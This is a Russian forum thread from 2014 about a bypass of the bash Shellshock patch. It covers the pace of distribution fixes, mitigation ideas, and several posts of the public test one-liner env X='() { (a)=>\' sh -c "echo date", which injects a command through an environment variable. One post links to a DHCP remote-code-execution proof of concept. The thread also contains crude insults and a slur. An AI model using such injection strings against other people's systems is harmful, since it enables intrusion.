77. "Найден способ обхода патча, устраняющего уязвимость в bash"  +1 +/
Сообщение от ананимас on 25-Сен-14, 21:38 
Fix CVE-2014-3659. The original fix in 25 was not enough.

Obtained from:    http://seclists.org/oss-sec/2014/q3/690 (bash developer)
Security:    CVE-2014-3659

Ответить | Правка | ^ к родителю #70 | Наверх | Cообщить модератору

78. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Xaionaro (ok) on 25-Сен-14, 21:52 
> сила и мощь опенсорца: дыра есть, а исправлять её некому

К моменту вашего комментария, проблема была исправлена на большинстве наших серверов.

Ответить | Правка | ^ к родителю #70 | Наверх | Cообщить модератору

87. "Найден способ обхода патча, устраняющего уязвимость в bash"  –3 +/
Сообщение от Аноним (??) on 26-Сен-14, 09:27 
в ночи разродились, к моменту написания моего комментария и несколько часов после него, нихрена не было. Вместе с тем, у бздунов и гентушников весь день всё было ок, ибо патч им подогнали раньше.
Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору

92. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Xaionaro email(ok) on 26-Сен-14, 11:30 
> в ночи разродились, к моменту написания моего комментария и несколько часов после
> него, нихрена не было. Вместе с тем, у бздунов и гентушников
> весь день всё было ок, ибо патч им подогнали раньше.

Ну, мы пытаемся делать защиту многослойной. Если кто-то что-то взломает, ему понадобится взламывать ещё много чего, чтобы хоть что-то полезное для себя получить. И сегодня будем заниматься анализом логов. К тому же данная уязвимость представляет хоть какую-то опасность для очень малого количества наших сервисов… В общем, я не вижу на что жаловаться.

Но если ближе к сути:

> сила и мощь опенсорца: дыра есть, а исправлять её некому

Патчи появились достаточно быстро. А если есть какие-то реально уязвимые сервисы, то их можно просто опустить на несколько часов (пока патч не появится)… ну или принять какие-то другие меры (в зависимости от обстоятельств), например заменить bash на что-нибудь, сделать обёртку для bash с проверкой символов "(){}" в переменных окружения, или добавить правило в iptables, или ещё что.

Ответить | Правка | ^ к родителю #87 | Наверх | Cообщить модератору

93. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 26-Сен-14, 12:35 
Жалуюсь на немощный редхет, у которого есть исходники, работники и что там ещё, а пакетов не было. По воводу многослойности: ко мне ночью приходил один такой искатель башей, его нжинкс редиректом прогнал.
Ответить | Правка | ^ к родителю #92 | Наверх | Cообщить модератору

95. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Xaionaro email(ok) on 26-Сен-14, 13:43 
> Жалуюсь на немощный редхет, у которого есть исходники, работники и что там
> ещё, а пакетов не было. По воводу многослойности: ко мне ночью
> приходил один такой искатель башей, его нжинкс редиректом прогнал.

Лично я ассоциирую Red Hat с Microsoft (только уже в мире СПО). Не думаю что стоит ориентироваться именно на него, говоря при этом про всё СПО.

Ответить | Правка | ^ к родителю #93 | Наверх | Cообщить модератору

105. "Найден способ обхода патча, устраняющего уязвимость в bash"  –2 +/
Сообщение от Аноним (??) on 26-Сен-14, 17:58 
> Лично я ассоциирую Red Hat с Microsoft (только уже в мире СПО).

Ну да, такие фаготы - 25% работы над ядром воротят. А в благодарность их с MS сравнивают. Довольно свинский подход.

Ответить | Правка | ^ к родителю #95 | Наверх | Cообщить модератору

112. "Найден способ обхода патча, устраняющего уязвимость в bash"  +1 +/
Сообщение от Аноним (??) on 26-Сен-14, 20:38 
>> Лично я ассоциирую Red Hat с Microsoft (только уже в мире СПО).
> Ну да, такие фаготы - 25% работы над ядром воротят. А в
> благодарность их с MS сравнивают. Довольно свинский подход.

справедливый подход. Превратить гну линукс в системдос это такая же срань, как и превратить сперва домашний компьютер, а после и вообще все кипятильники на х86, в запускалки вантузов

Ответить | Правка | ^ к родителю #105 | Наверх | Cообщить модератору

118. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Xaionaro (ok) on 27-Сен-14, 16:57 
>> Лично я ассоциирую Red Hat с Microsoft (только уже в мире СПО).
> Ну да, такие фаготы - 25% работы над ядром воротят. А в
> благодарность их с MS сравнивают. Довольно свинский подход.

25%? Откуда у вас такая информация? Больше всего вносит Intel, и его доля и то лишь 10%. Но а так, даже Microsoft был некоторое время в top-листе contributor-ов ядра Linux, хотя их основная деятельность направлена не на СПО... А представьте, если бы они специализировались  именно на СПО, то что было бы?

В общем, IMHO, это не показатель. А вот то, какие стандарты и подходы они используют и пытаются проталкивать -- это уже более показательно. Облачности, systemd, GFS2 (который хрен где заведётся, кроме как на их ядре) и т.п.

Ответить | Правка | ^ к родителю #105 | Наверх | Cообщить модератору

96. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 26-Сен-14, 14:07 
На большинстве ваших, а на большинстве остальных? И всем дружно костыли городить в iptables? В дистрах заплатка не появилась. Вчерашняя не в счет, т к неполноценная.
Ответить | Правка | ^ к родителю #78 | Наверх | Cообщить модератору

98. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Xaionaro email(ok) on 26-Сен-14, 15:28 
> В дистрах заплатка не появилась. Вчерашняя не в счет,
> т к неполноценная.

В каких «дистрах» заплатка не появилась?


Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

100. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 26-Сен-14, 15:59 
>> В дистрах заплатка не появилась. Вчерашняя не в счет,
>> т к неполноценная.
> В каких «дистрах» заплатка не появилась?

убунта, арч, альт, другие не юзаю сейчас.

Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

106. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Xaionaro email(ok) on 26-Сен-14, 18:14 
>>> В дистрах заплатка не появилась. Вчерашняя не в счет,
>>> т к неполноценная.
>> В каких «дистрах» заплатка не появилась?
> убунта

Не пользую, не знаю…

> , арч

Один мой коллега сказал, что там фактически сразу появилось исправление.

> , альт

С ALT-ом у меня проблема в том, что он сертифицированный ФСТЭК, и я бы не хотел обсуждать принятые меры на публичном ресурсе. Но проблема чисто технически решилась быстро, напрочь и очень легко.

> , другие не юзаю сейчас.

У нас на Gentoo и на Debian не было никаких проблем со скоростью появления исправленного bash.

Ответить | Правка | ^ к родителю #100 | Наверх | Cообщить модератору

108. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 26-Сен-14, 18:23 
> Не пользую, не знаю…

Приехал "дважды пофикшеный". Фикс на фикс - это круто!

Ответить | Правка | ^ к родителю #106 | Наверх | Cообщить модератору

110. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноном on 26-Сен-14, 18:42 
В убунтах давно появилась, я имею ввиду вторую.
Ответить | Правка | ^ к родителю #100 | Наверх | Cообщить модератору

82. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Аноним (??) on 25-Сен-14, 23:20 
В убунте сабжевая команда не работает, в арче ли альте работает (после обновлений)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

83. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Аноним (??) on 25-Сен-14, 23:22 
Вру. там просто sh ссылается на dash. Уязвимость есть.
Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

86. "Найден способ обхода патча, устраняющего уязвимость в bash"  –2 +/
Сообщение от Michael Shigorin email(ok) on 26-Сен-14, 07:25 
$ env X='() { (a)=>\' sh -c "echo date"; cat echo
date
cat: echo: Нет такого файла или каталога
$ bash --version
GNU bash, version 3.2.52(1)-release (x86_64-alt-linux-gnu)
Copyright (C) 2007 Free Software Foundation, Inc.

http://git.altlinux.org/gears/b/bash.git
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

89. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 26-Сен-14, 10:17 
Тухлость тоже вариант, это да.
Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

107. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 26-Сен-14, 18:22 
> Тухлость тоже вариант, это да.

Готов поспорить, CP/M неуязвима для этого бага :).

Ответить | Правка | ^ к родителю #89 | Наверх | Cообщить модератору

127. "Найден способ обхода патча, устраняющего уязвимость в bash"  +1 +/
Сообщение от Аноним (??) on 08-Окт-14, 18:15 
> Тухлость тоже вариант, это да.

(ехидно) Расскажи это ВВС США после войны в Югославии.

"Продается два слегка побитых F-117. Самовывоз из Югославии"

Слегка тухлые радары 60х их видели как стеклянных. Ну и, соответственно, палить в них можно было.

Видаль сосун, как резво 117е после войны вывели из обращения? :D

Ответить | Правка | ^ к родителю #89 | Наверх | Cообщить модератору

97. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 26-Сен-14, 15:22 
env X='() { (a)=>\' bash -c "echo date"; cat echo
Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

99. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Аноним (??) on 26-Сен-14, 15:58 
В альте баш - дефолт, хотя у Шигорина может быть что угодно.
Ответить | Правка | ^ к родителю #97 | Наверх | Cообщить модератору

129. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Michael Shigorin email(ok) on 08-Окт-14, 18:24 
> В альте баш - дефолт, хотя у Шигорина может быть что угодно.

zsh, разумеется. :)

Ответить | Правка | ^ к родителю #99 | Наверх | Cообщить модератору

120. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от timur email(??) on 29-Сен-14, 17:37 
Однако же
$env X='() { (a)=>\' sh -c "echo date"; cat echo
date
cat: echo: No such file or directory
Ответить | Правка | ^ к родителю #97 | Наверх | Cообщить модератору

88. "Найден способ обхода патча, устраняющего уязвимость в bash"  +2 +/
Сообщение от Фанатик on 26-Сен-14, 09:58 
А вот и PoC [1].

[1] https://www.trustedsec.com/september-2014/shellshock-dhcp-rc.../

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

90. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Фанатик on 26-Сен-14, 10:33 
Ну хоть Поттеринг нам написал netwrokd, который неуязвим(для конкретно этой ошибки)
Ответить | Правка | ^ к родителю #88 | Наверх | Cообщить модератору

114. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 27-Сен-14, 01:34 
> А вот и PoC [1].
> [1] https://www.trustedsec.com/september-2014/shellshock-dhcp-rc.../

на скриншотике слака уязвилась через dhcpcd.

есличо в слаке апдейтики приехали уже:

http://www.slackware.com/security/viewer.php?l=slackware-sec...

http://www.slackware.com/security/viewer.php?l=slackware-sec...

Ответить | Правка | ^ к родителю #88 | Наверх | Cообщить модератору

117. "Найден способ обхода патча, устраняющего уязвимость в bash"  +/
Сообщение от Аноним (??) on 27-Сен-14, 15:41 
REPL - зло.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

121. "Найден способ обхода патча, устраняющего уязвимость в bash"  –1 +/
Сообщение от Никъ on 04-Окт-14, 22:31 
патчи к башу ваять - все равно что воду ситом вычерпывать.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру